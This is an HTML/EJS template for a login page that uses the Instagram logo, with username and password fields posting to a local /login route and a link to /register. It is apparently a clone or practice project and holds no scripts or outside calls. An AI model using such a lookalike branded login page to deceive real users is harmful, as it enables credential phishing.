<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
 <link rel="stylesheet" href="/stylesheets/style.css"> 
</head>
<body>    <% if(error.length >0){ %>
  <h1><%= error %></h1>
  <% } %>

  
    <span id="root">
      <section class="section-all">
    
        
        <main class="main" role="main">
          <div class="wrapper">
            <article class="article">
              <div class="content">
                <div class="login-box">
                  <div class="header">
                    <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png" alt="Instagram">
                  </div>
                 

                  <div class="form-wrap">
                    <form class="form" action="/login" method="post">
                    
                      <div class="input-box">
                        <input type="text" id="name"  name="username" placeholder="username" >
                      </div>  
  
                      <div class="input-box">
                        <input type="password" name="password" id="password" placeholder="Password" >
                      </div>  
  
                      <span class="button-box">
                        <button class="btn" type="submit" name="submit">Log in</button>
                      </span>  
  
                      <a class="forgot" href="">Forgot password?</a>
                    </form>
                  </div> <!-- Form-wrap end -->
                </div> <!-- Login-box end -->
  
                <div class="login-box">
                  <a class="text" href="/register">Don't have an account?Sign up</a>
                </div> <!-- Signup-box end -->
  
               
  </body>
</html>